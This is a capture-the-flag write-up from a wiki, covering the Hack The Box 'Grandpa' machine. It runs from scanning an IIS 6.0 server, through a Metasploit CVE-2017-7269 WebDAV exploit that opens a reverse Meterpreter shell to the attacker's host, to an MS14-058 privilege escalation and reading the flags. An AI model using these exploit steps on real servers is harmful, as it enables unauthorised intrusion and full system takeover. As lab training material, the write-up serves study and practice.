Grandpa

From Luniwiki
Jump to: navigation, search

Back

Grandpa01.png

Port scanning

root@kali:~/HTB/Machines/Grandpa# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.14 --rate=1000
Starting masscan 1.0.5 at 2019-11-17 04:25:04 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.10.14

Only the port 80 is open.

root@kali:~/HTB/Machines/Grandpa# nmap -A -T4 -v 10.10.10.14
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-16 23:27 EST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 23:27
Completed NSE at 23:27, 0.00s elapsed
Initiating NSE at 23:27
Completed NSE at 23:27, 0.00s elapsed
Initiating NSE at 23:27
Completed NSE at 23:27, 0.00s elapsed
Initiating Ping Scan at 23:27
Scanning 10.10.10.14 [4 ports]
Completed Ping Scan at 23:27, 0.09s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 23:27
Scanning grandpa.htb (10.10.10.14) [1000 ports]
Discovered open port 80/tcp on 10.10.10.14
Completed SYN Stealth Scan at 23:27, 5.28s elapsed (1000 total ports)
Initiating Service scan at 23:27
Scanning 1 service on grandpa.htb (10.10.10.14)
Completed Service scan at 23:27, 6.10s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against grandpa.htb (10.10.10.14)
Retrying OS detection (try #2) against grandpa.htb (10.10.10.14)
Initiating Traceroute at 23:27
Completed Traceroute at 23:27, 0.06s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 23:27
Completed Parallel DNS resolution of 2 hosts. at 23:27, 0.19s elapsed
NSE: Script scanning 10.10.10.14.
Initiating NSE at 23:27
Completed NSE at 23:27, 0.94s elapsed
Initiating NSE at 23:27
Completed NSE at 23:27, 0.19s elapsed
Initiating NSE at 23:27
Completed NSE at 23:27, 0.00s elapsed
Nmap scan report for grandpa.htb (10.10.10.14)
Host is up (0.047s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT POST MOVE MKCOL PROPPATCH
|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
| http-ntlm-info:
|   Target_Name: GRANPA
|   NetBIOS_Domain_Name: GRANPA
|   NetBIOS_Computer_Name: GRANPA
|   DNS_Domain_Name: granpa
|   DNS_Computer_Name: granpa
|_  Product_Version: 5.2.3790
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
|   WebDAV type: Unknown
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   Server Date: Sun, 17 Nov 2019 04:27:50 GMT
|   Server Type: Microsoft-IIS/6.0
|_  Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2003|2008|XP|2000 (92%)
OS CPE: cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_server_2008::sp2 cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_2000::sp4
Aggressive OS guesses: Microsoft Windows Server 2003 SP1 or SP2 (92%), Microsoft Windows Server 2008 Enterprise SP2 (92%), Microsoft Windows Server 2003 SP2 (90%), Microsoft Windows XP SP3 (90%), Microsoft Windows 2003 SP2 (89%), Microsoft Windows XP (87%), Microsoft Windows Server 2003 SP1 - SP2 (86%), Microsoft Windows 2000 SP4 (85%), Microsoft Windows XP SP2 or Windows Server 2003 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 80/tcp) HOP RTT ADDRESS 1 46.64 ms 10.10.14.1 2 46.76 ms grandpa.htb (10.10.10.14)
NSE: Script Post-scanning. Initiating NSE at 23:27 Completed NSE at 23:27, 0.00s elapsed Initiating NSE at 23:27 Completed NSE at 23:27, 0.00s elapsed Initiating NSE at 23:27 Completed NSE at 23:27, 0.00s elapsed Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 17.51 seconds Raw packets sent: 2084 (95.284KB) | Rcvd: 38 (2.416KB)

We try to find any vulnerability

root@kali:~/HTB/Machines/Grandpa# nmap -p 80 --script vuln 10.10.10.14
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-16 23:29 EST
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for grandpa.htb (10.10.10.14)
Host is up (0.046s latency).

PORT STATE SERVICE 80/tcp open http |_clamav-exec: ERROR: Script execution failed (use -d to debug) |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. | http-enum: | /postinfo.html: Frontpage file or folder | /_vti_bin/_vti_aut/author.dll: Frontpage file or folder | /_vti_bin/_vti_aut/author.exe: Frontpage file or folder | /_vti_bin/_vti_adm/admin.dll: Frontpage file or folder | /_vti_bin/_vti_adm/admin.exe: Frontpage file or folder | /_vti_bin/fpcount.exe?Page=default.asp|Image=3: Frontpage file or folder | /_vti_bin/shtml.dll: Frontpage file or folder |_ /_vti_bin/shtml.exe: Frontpage file or folder | http-frontpage-login: | VULNERABLE: | Frontpage extension anonymous login | State: VULNERABLE | Default installations of older versions of frontpage extensions allow anonymous logins which can lead to server compromise. onymous logins which can lead to server compromise. | | References: |_ http://insecure.org/sploits/Microsoft.frontpage.insecurities.html |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
Nmap done: 1 IP address (1 host up) scanned in 209.95 seconds

Web Server

Grandpa02.png

The web server seems to be default IIS web page.

root@kali:~/HTB/Machines/Grandpa# dirb  http://10.10.10.14

----------------- DIRB v2.22 By The Dark Raver -----------------
START_TIME: Sat Nov 16 23:48:24 2019 URL_BASE: http://10.10.10.14/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.14/ ---- + http://10.10.10.14/_private (CODE:403|SIZE:1529) ==> DIRECTORY: http://10.10.10.14/_vti_bin/ + http://10.10.10.14/_vti_bin/_vti_adm/admin.dll (CODE:200|SIZE:195) + http://10.10.10.14/_vti_bin/_vti_aut/author.dll (CODE:200|SIZE:195) + http://10.10.10.14/_vti_bin/shtml.dll (CODE:200|SIZE:96) + http://10.10.10.14/_vti_cnf (CODE:403|SIZE:1529) + http://10.10.10.14/_vti_log (CODE:403|SIZE:1529) + http://10.10.10.14/_vti_pvt (CODE:403|SIZE:1529) + http://10.10.10.14/_vti_txt (CODE:403|SIZE:1529) + http://10.10.10.14/aspnet_client (CODE:403|SIZE:218) ==> DIRECTORY: http://10.10.10.14/images/ ==> DIRECTORY: http://10.10.10.14/Images/
---- Entering directory: http://10.10.10.14/_vti_bin/ ---- ==> DIRECTORY: http://10.10.10.14/_vti_bin/_vti_aut/
---- Entering directory: http://10.10.10.14/images/ ----
---- Entering directory: http://10.10.10.14/Images/ ----
---- Entering directory: http://10.10.10.14/_vti_bin/_vti_aut/ ----
----------------- END_TIME: Sun Nov 17 00:06:46 2019 DOWNLOADED: 23060 - FOUND: 9

Dirb doesn't find anything interresting, except Front page extensions are installed.

Frontend extensions

root@kali:~/HTB/Machines/Grandpa# wget http://10.10.10.14/_vti_inf.html
root@kali:~/HTB/Machines/Grandpa# cat _vti_inf.html
...
--><!-- FrontPage Configuration Information
    FPVersion="5.0.2.6790"
    FPShtmlScriptUrl="_vti_bin/shtml.dll/_vti_rpc"
    FPAuthorScriptUrl="_vti_bin/_vti_aut/author.dll"
    FPAdminScriptUrl="_vti_bin/_vti_adm/admin.dll"
    TPScriptUrl="_vti_bin/owssvr.dll"
-->
...

Search of exploits

root@kali:~/HTB/Machines/Grandpa# searchsploit Frontpage
---------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                          |  Path
                                                                                        | (/usr/share/exploitdb/)
---------------------------------------------------------------------------------------- ----------------------------------------
FrontPage 2000 / IIS 4.0/5.0 - Server Extensions Full Path Disclosure                   | exploits/windows/remote/19897.txt
FrontPage 97/98 - Server Image Mapper Buffer Overflow                                   | exploits/windows/dos/19853.txt
FrontPage 98/Personal WebServer 1.0 / Personal Web Server 2.0 - 'htimage.exe' File Exis | exploits/windows/remote/19877.txt
Goople 1.8.2 - 'FrontPage.php' Blind SQL Injection                                      | exploits/php/webapps/7683.pl
Microsoft FrontPage - Server Extensions Cross-Site Scripting                            | exploits/cgi/webapps/27620.txt
Microsoft FrontPage 98 Server Extensions for IIS / Microsoft InterDev 1.0 - Filename Ob | exploits/windows/remote/19845.pl
Microsoft FrontPage 98 Server Extensions for IIS / Microsoft InterDev 1.0 - Remote Buff | exploits/windows/remote/19846.pl
Microsoft FrontPage Personal Web Server 1.0 - PWS Denial of Service                     | exploits/windows/dos/19445.txt
Microsoft FrontPage Personal Web Server 1.0/4.0 - Directory Traversal                   | exploits/windows/remote/19753.txt
Microsoft FrontPage Server Extensions - 'fp30reg.dll' (MS03-051)                        | exploits/windows/remote/121.c
Microsoft IIS - ISAPI FrontPage 'fp30reg.dll' Chunked Overflow (MS03-051) (Metasploit)  | exploits/windows/remote/16356.rb
OpenClassifieds 1.7.0.3 - Chained: Captcha Bypass / SQL Injection / Persistent Cross-Si | exploits/php/webapps/15838.php
Travelsized CMS 0.4 - 'FrontPage.php' Remote File Inclusion                             | exploits/php/webapps/2471.pl
Uberghey 0.3.1 - 'FrontPage.php' Remote File Inclusion                                  | exploits/php/webapps/3147.txt
---------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

The MS03-051 doesn't fit our version of frontpage extensions.

root@kali:~/HTB/Machines/Grandpa# msfconsole
msf5 > search MS03-051
Matching Modules
================

# Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/windows/isapi/ms03_051_fp30reg_chunked 2003-11-11 good Yes MS03-051 Microsoft IIS ISAPI FrontPage fp30reg.dll Chunked Overflow
msf5 > use exploit/windows/isapi/ms03_051_fp30reg_chunked msf5 exploit(windows/isapi/ms03_051_fp30reg_chunked) > set RHOST 10.10.10.14 RHOST => 10.10.10.14 msf5 exploit(windows/isapi/ms03_051_fp30reg_chunked) > check
[*] Requesting the vulnerable ISAPI path... [*] 10.10.10.14:80 - The target is not exploitable.

Front page seems to be a dead end.

IIS 6.0

root@kali:~/HTB/Machines/Grandpa# searchsploit IIS 6.0
---------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                          |  Path
                                                                                        | (/usr/share/exploitdb/)
---------------------------------------------------------------------------------------- ----------------------------------------
Microsoft IIS 4.0/5.0/6.0 - Internal IP Address/Internal Network Name Disclosure        | exploits/windows/remote/21057.txt
Microsoft IIS 5.0/6.0 FTP Server (Windows 2000) - Remote Stack Overflow                 | exploits/windows/remote/9541.pl
Microsoft IIS 5.0/6.0 FTP Server - Stack Exhaustion Denial of Service                   | exploits/windows/dos/9587.txt
Microsoft IIS 6.0 - '/AUX / '.aspx' Remote Denial of Service                            | exploits/windows/dos/3965.pl
Microsoft IIS 6.0 - ASP Stack Overflow Stack Exhaustion (Denial of Service) (MS10-065)  | exploits/windows/dos/15167.txt
Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow                | exploits/windows/remote/41738.py
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (1)                             | exploits/windows/remote/8704.txt
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (2)                             | exploits/windows/remote/8806.pl
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (PHP)                           | exploits/windows/remote/8765.php
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (Patch)                         | exploits/windows/remote/8754.patch
Microsoft IIS 6.0/7.5 (+ PHP) - Multiple Vulnerabilities                                | exploits/windows/remote/19033.txt
---------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

The CVE-2017-7269 (ScStoragePathFromUrl) is very interesting. The python script 41738.py works, but only opens a calc.exe on the server. But there is a metasploit vulnerability.

root@kali:~/HTB/Machines/Grandpa# msfconsole
msf5 > search CVE-2017-7269

Matching Modules ================
# Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/windows/iis/iis_webdav_scstoragepathfromurl 2017-03-26 manual Yes Microsoft IIS WebDav ScStoragePathFromUrl Overflow msf5 > use exploit/windows/iis/iis_webdav_scstoragepathfromurl msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set RHOSTS 10.10.10.14 RHOSTS => 10.10.10.14 msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > check [+] 10.10.10.14:80 - The target is vulnerable. msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run
[*] Started reverse TCP handler on 10.10.14.34:4444 [*] Trying path length 3 to 60 ... [*] Sending stage (180291 bytes) to 10.10.10.14 [*] Meterpreter session 1 opened (10.10.14.34:4444 -> 10.10.10.14:1043) at 2019-11-17 22:16:46 -0500 meterpreter > getuid Server username: NT AUTHORITY\NETWORK SERVICE meterpreter > shell Process 2104 created. Channel 1 created. Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp.
C:\Documents and Settings>systeminfo systeminfo
Host Name: GRANPA OS Name: Microsoft(R) Windows(R) Server 2003, Standard Edition OS Version: 5.2.3790 Service Pack 2 Build 3790 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Server OS Build Type: Uniprocessor Free Registered Owner: HTB Registered Organization: HTB Product ID: 69712-296-0024942-44782 Original Install Date: 4/12/2017, 5:07:40 PM System Up Time: 0 Days, 3 Hours, 3 Minutes, 33 Seconds System Manufacturer: VMware, Inc. System Model: VMware Virtual Platform System Type: X86-based PC Processor(s): 1 Processor(s) Installed. [01]: x86 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz BIOS Version: INTEL - 6040000 Windows Directory: C:\WINDOWS System Directory: C:\WINDOWS\system32 Boot Device: \Device\HarddiskVolume1 System Locale: en-us;English (United States) Input Locale: en-us;English (United States) Time Zone: (GMT+02:00) Athens, Beirut, Istanbul, Minsk Total Physical Memory: 1,023 MB Available Physical Memory: 792 MB Page File: Max Size: 2,470 MB Page File: Available: 2,321 MB Page File: In Use: 149 MB Page File Location(s): C:\pagefile.sys Domain: HTB Logon Server: N/A Hotfix(s): 1 Hotfix(s) Installed. [01]: Q147222 Network Card(s): N/A
meterpreter > pwd C:\Documents and Settings meterpreter > cd Administrator [-] stdapi_fs_chdir: Operation failed: Access is denied. meterpreter > bg [*] Backgrounding session 1... msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use post/multi/recon/local_exploit_suggester msf5 post(multi/recon/local_exploit_suggester) > set session 1 session => 1 msf5 post(multi/recon/local_exploit_suggester) > set SHOWDESCRIPTION true SHOWDESCRIPTION => true msf5 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.14 - Collecting local exploits for x86/windows... [*] 10.10.10.14 - 29 exploit checks are being tried... [+] 10.10.10.14 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated. This module will create a new session with SYSTEM privileges via the KiTrap0D exploit by Tavis Ormandy. If the session in use is already elevated then the exploit will not run. The module relies on kitrap0d.x86.dll, and is not supported on x64 editions of Windows. [+] 10.10.10.14 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable. This module exploits a NULL Pointer Dereference in win32k.sys, the vulnerability can be triggered through the use of TrackPopupMenu. Under special conditions, the NULL pointer dereference can be abused on xxxSendMessageTimeout to achieve arbitrary code execution. This module has been tested successfully on Windows XP SP3, Windows 2003 SP2, Windows 7 SP1 and Windows 2008 32bits. Also on Windows 7 SP1 and Windows 2008 R2 SP1 64 bits. [+] 10.10.10.14 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable. A vulnerability within the Microsoft TCP/IP protocol driver tcpip.sys can allow a local attacker to trigger a NULL pointer dereference by using a specially crafted IOCTL. This flaw can be abused to elevate privileges to SYSTEM. [+] 10.10.10.14 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable. This module exploits improper object handling in the win32k.sys kernel mode driver. This module has been tested on vulnerable builds of Windows 7 x64 and x86, and Windows 2008 R2 SP1 x64. [+] 10.10.10.14 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated. This module exploits the vulnerability in mrxdav.sys described by MS16-016. The module will spawn a process on the target system and elevate its privileges to NT AUTHORITY\SYSTEM before executing the specified payload within the context of the elevated process. [+] 10.10.10.14 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated. This module exploits the lack of sanitization of standard handles in Windows' Secondary Logon Service. The vulnerability is known to affect versions of Windows 7-10 and 2k8-2k12 32 and 64 bit. This module will only work against those versions of Windows with Powershell 2.0 or later and systems with two or more CPU cores. [+] 10.10.10.14 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable. Module utilizes the Net-NTLMv2 reflection between DCOM/RPC to achieve a SYSTEM handle for elevation of privilege. Currently the module does not spawn as SYSTEM, however once achieving a shell, one can easily use incognito to impersonate the token. [+] 10.10.10.14 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable. This module utilizes the Net-NTLMv2 reflection between DCOM/RPC to achieve a SYSTEM handle for elevation of privilege. It requires a CLSID string. [+] 10.10.10.14 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable. This module exploits a vulnerability on EPATHOBJ::pprFlattenRec due to the usage of uninitialized data which allows to corrupt memory. At the moment, the module has been tested successfully on Windows XP SP3, Windows 2003 SP1, and Windows 7 SP1. [*] Post module execution completed

The MS14-058 seems to be the more adecuate.

msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms14_058_track_popup_menu
msf5 exploit(windows/local/ms14_058_track_popup_menu) > set session 1
session => 1
msf5 exploit(windows/local/ms14_058_track_popup_menu) > set LHOST 10.10.14.34
LHOST => 10.10.14.34
msf5 exploit(windows/local/ms14_058_track_popup_menu) > run

[*] Started reverse TCP handler on 10.10.14.34:4444 [-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_config_getsid: Operation failed: Access is denied. [*] Exploit completed, but no session was created.

There wasn't expected.

msf5 exploit(windows/local/ms14_058_track_popup_menu) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ps
Process List ============
PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 0 0 [System Process] 4 0 System 272 4 smss.exe 324 272 csrss.exe 348 272 winlogon.exe 396 348 services.exe 408 348 lsass.exe 608 396 svchost.exe 680 396 svchost.exe 736 396 svchost.exe 772 396 svchost.exe 800 396 svchost.exe 936 396 spoolsv.exe 964 396 msdtc.exe 1076 396 cisvc.exe 1116 396 svchost.exe 1176 396 inetinfo.exe 1216 396 svchost.exe 1328 396 VGAuthService.exe 1408 396 vmtoolsd.exe 1456 396 svchost.exe 1600 396 svchost.exe 1700 396 alg.exe 1832 608 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\wbem\wmiprvse.exe 1912 396 dllhost.exe 2304 608 wmiprvse.exe 2336 1456 w3wp.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\windows\system32\inetsrv\w3wp.exe 2404 608 davcdata.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\inetsrv\davcdata.exe 2452 2336 rundll32.exe x86 0 C:\WINDOWS\system32\rundll32.exe 3000 608 wmiprvse.exe 3592 800 wmiadap.exe
meterpreter > migrate 1832 [*] Migrating from 2452 to 1832... [*] Migration completed successfully. meterpreter > bg [*] Backgrounding session 1...
msf5 exploit(windows/local/ms14_058_track_popup_menu) > run
[*] Started reverse TCP handler on 10.10.14.34:4444 [*] Launching notepad to host the exploit... [+] Process 3872 launched. [*] Reflectively injecting the exploit DLL into 3872... [*] Injecting exploit into 3872... [*] Exploit injected. Injecting payload into 3872... [*] Payload injected. Executing exploit... [+] Exploit finished, wait for (hopefully privileged) payload execution to complete. [*] Sending stage (180291 bytes) to 10.10.10.14 [*] Meterpreter session 3 opened (10.10.14.34:4444 -> 10.10.10.14:1034) at 2019-11-17 22:55:13 -0500
meterpreter > getuid Server username: NT AUTHORITY\SYSTEM

User and root flags

meterpreter > shell
Process 4008 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>cd "C:\Documents and Settings\" cd "C:\Documents and Settings\"
C:\Documents and Settings>dir dir Volume in drive C has no label. Volume Serial Number is 246C-D7FE
Directory of C:\Documents and Settings
04/12/2017 04:32 PM <DIR> . 04/12/2017 04:32 PM <DIR> .. 04/12/2017 04:12 PM <DIR> Administrator 04/12/2017 04:03 PM <DIR> All Users 04/12/2017 04:32 PM <DIR> Harry 0 File(s) 0 bytes 5 Dir(s) 18,091,675,648 bytes free
C:\Documents and Settings>cd Harry\Desktop cd Harry\Desktop
C:\Documents and Settings\Harry\Desktop>type user.txt type user.txt <USER FLAG>
C:\Documents and Settings>cd Administrator\Desktop cd Administrator\Desktop
C:\Documents and Settings\Administrator\Desktop>type root.txt type root.txt <ROOT FLAG>

References

Daniel Simao 21:29, 17 November 2019 (EST)